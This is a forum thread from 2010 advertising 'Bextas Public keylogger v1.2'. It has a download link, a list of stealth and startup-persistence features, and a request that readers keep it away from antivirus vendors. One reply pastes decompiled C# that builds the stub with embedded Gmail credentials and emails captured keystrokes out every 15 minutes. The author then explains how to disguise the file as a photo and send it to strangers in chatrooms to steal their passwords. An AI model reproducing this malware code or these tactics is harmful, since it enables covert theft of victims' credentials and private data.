It is currently Thu Sep 09, 2010 4:38 am

All times are UTC + 2 hours



Post new topic Reply to topic  [ 10 posts ] 
Author Message
 Post subject: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Wed Jan 27, 2010 1:18 pm 
Offline
 Profile

Joined: Sat Aug 15, 2009 7:18 pm
Posts: 30
Hi guys

I've been working on my keylogger and fixing some bugs

It is tested and its working :roll:
screenshot

Image

Features
Add to startup using registry
Logs sent in every 15 minutes
user friendly GUI
support Gmail
Test e-mail is it valid or no
Log open window, which will make logging much easier
Hidden really good & invisible
Send new logs over and over again
your virus Icon as jpeg picture Icon




download link
http://www.datafilehost.com/download-58bd0464.html

Note
Don't send this program to Antivirus companies, so that it can be undetectable for long time

I am selling a private version of this , (FUD) Fully Undetectable by any antivirus and with many new features and with clear logs
PM me if you want to buy it


Last edited by bextas on Wed Feb 03, 2010 8:49 pm, edited 1 time in total.

Top
 

 Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Thu Jan 28, 2010 9:01 pm 
Offline
 WWW  Profile

Joined: Wed Mar 25, 2009 2:56 pm
Posts: 123
Location: Alpha Centauri B
Clean.


Send Test Mail:

private void Button3_Click(object sender, EventArgs e)
{
MailMessage message = new MailMessage {
From = new MailAddress(this.TextBox1.Text)
};
message.To.Add(this.TextBox1.Text);
message.Subject = MyProject.Computer.Name + ":";
message.Body = "----------This is a test----------";
new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential(this.TextBox1.Text, this.TextBox2.Text) }.Send(message);
}

Create Stub:

private void Button1_Click(object sender, EventArgs e)
{
this.text1 = this.TextBox1.Text;
this.text2 = this.TextBox2.Text;
FileSystem.FileOpen(1, Application.StartupPath + @"\stub1.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default, -1);
this.stub1 = Strings.Space((int) FileSystem.LOF(1));
FileSystem.FileGet(1, ref this.stub1, -1L, false);
FileSystem.FileClose(new int[0]);
if (File.Exists(this.TextBox3.Text))
{
MyProject.Computer.FileSystem.DeleteFile(this.TextBox3.Text);
}
FileSystem.FileOpen(1, Application.StartupPath + @"\" + this.TextBox3.Text, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default, -1);
FileSystem.FilePut(1, this.stub1 + "@bextas@" + this.text1 + "@bextas@" + this.text2 + "@bextas@", -1L, false);
MessageBox.Show(this.TextBox3.Text + " is created", "information", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
}


Keylogger:

private void Timer2_Tick(object sender, EventArgs e)
{
MailMessage message = new MailMessage {
From = new MailAddress(this.TextBox1.Text)
};
message.To.Add(this.TextBox1.Text);
message.Subject = MyProject.Computer.Name + ":";
message.Body = this.TextBox3.Text;
new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential(this.TextBox1.Text, this.TextBox2.Text) }.Send(message);
this.TextBox3.Clear();
}


Top
 

 Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Fri Jan 29, 2010 1:08 pm 
Offline
 Profile

Joined: Sat Aug 15, 2009 7:18 pm
Posts: 30
Reelix wrote:
Clean.


Send Test Mail:

private void Button3_Click(object sender, EventArgs e)
{
MailMessage message = new MailMessage {
From = new MailAddress(this.TextBox1.Text)
};
message.To.Add(this.TextBox1.Text);
message.Subject = MyProject.Computer.Name + ":";
message.Body = "----------This is a test----------";
new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential(this.TextBox1.Text, this.TextBox2.Text) }.Send(message);
}

Create Stub:

private void Button1_Click(object sender, EventArgs e)
{
this.text1 = this.TextBox1.Text;
this.text2 = this.TextBox2.Text;
FileSystem.FileOpen(1, Application.StartupPath + @"\stub1.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default, -1);
this.stub1 = Strings.Space((int) FileSystem.LOF(1));
FileSystem.FileGet(1, ref this.stub1, -1L, false);
FileSystem.FileClose(new int[0]);
if (File.Exists(this.TextBox3.Text))
{
MyProject.Computer.FileSystem.DeleteFile(this.TextBox3.Text);
}
FileSystem.FileOpen(1, Application.StartupPath + @"\" + this.TextBox3.Text, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default, -1);
FileSystem.FilePut(1, this.stub1 + "@bextas@" + this.text1 + "@bextas@" + this.text2 + "@bextas@", -1L, false);
MessageBox.Show(this.TextBox3.Text + " is created", "information", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
}


Keylogger:

private void Timer2_Tick(object sender, EventArgs e)
{
MailMessage message = new MailMessage {
From = new MailAddress(this.TextBox1.Text)
};
message.To.Add(this.TextBox1.Text);
message.Subject = MyProject.Computer.Name + ":";
message.Body = this.TextBox3.Text;
new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential(this.TextBox1.Text, this.TextBox2.Text) }.Send(message);
this.TextBox3.Clear();
}


I'm not all you guys thinking,
you are like my family, and i won't do anything stupid to my programs,
but trust no one :mrgreen: , but i'm not saying you should not trust me, if you want, you can trust me but if you don't then GTFO

And i worked hard on this keylogger, to make it work properly and adding some features.

And no thanks,no nothing cm on Guys.... :mrgreen:


Last edited by bextas on Fri Jan 29, 2010 8:19 pm, edited 1 time in total.

Top
 

 Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Fri Jan 29, 2010 7:25 pm 
Offline
 Profile

Joined: Wed Jun 03, 2009 7:31 pm
Posts: 282
your keylogger is not identified by my vista operating system. Is it not suppose to show as exe? it's format is "file"


Top
 

 Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Fri Jan 29, 2010 8:14 pm 
Offline
 Profile

Joined: Sat Aug 15, 2009 7:18 pm
Posts: 30
Hacker89 wrote:
your keylogger is not identified by my vista operating system. Is it not suppose to show as exe? it's format is "file"


drag and drop that file into a winrar then extract keylogger filet to your Desktop or were you can easily find it


Top
 

 Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Sat Jan 30, 2010 11:47 am 
Offline
 Profile

Joined: Wed Jun 03, 2009 7:31 pm
Posts: 282
Okay i will do that right away


Top
 

 Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Sat Jan 30, 2010 12:09 pm 
Offline
 Profile

Joined: Wed Jun 03, 2009 7:31 pm
Posts: 282
So now i have it but how will i go about setting it up if i want to lock someone's password on their pc and wnat it to be send to my email address


Top
 

 Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Sat Jan 30, 2010 1:45 pm 
Offline
 Profile

Joined: Sat Aug 15, 2009 7:18 pm
Posts: 30
Hacker89 wrote:
So now i have it but how will i go about setting it up if i want to lock someone's password on their pc and wnat it to be send to my email address


use your Gmail account and enter your Gmail address and password on keylogger builder then click on build then it will create a server, as a picture Icon, then send it to someone like on online chatrooms or MSN then tell them that it is a picture of your sister :mrgreen: then if they click and run it, it will install itself in background, so they won't notice that they have been keylogged,

so after 15 check your emails, then you will get their info.
Email subject will be their computer name

[Edit]
don't click stub, leave it the way it is
cheers


Top
 

 Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Sun Jan 31, 2010 9:55 am 
Offline
 Profile

Joined: Wed Jun 03, 2009 7:31 pm
Posts: 282
Lokl :mrgreen: That is a great i dea i should try that out


Top
 

 Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed]
PostPosted: Mon Feb 01, 2010 5:14 pm 
Offline
 Profile

Joined: Sat Aug 15, 2009 7:18 pm
Posts: 30
Hacker89 wrote:
Lokl :mrgreen: That is a great i dea i should try that out


lol yea, give it a try


Top
 

Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 10 posts ] 

All times are UTC + 2 hours


Who is online

Users browsing this forum: No registered users and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group  
Design By Poker Bandits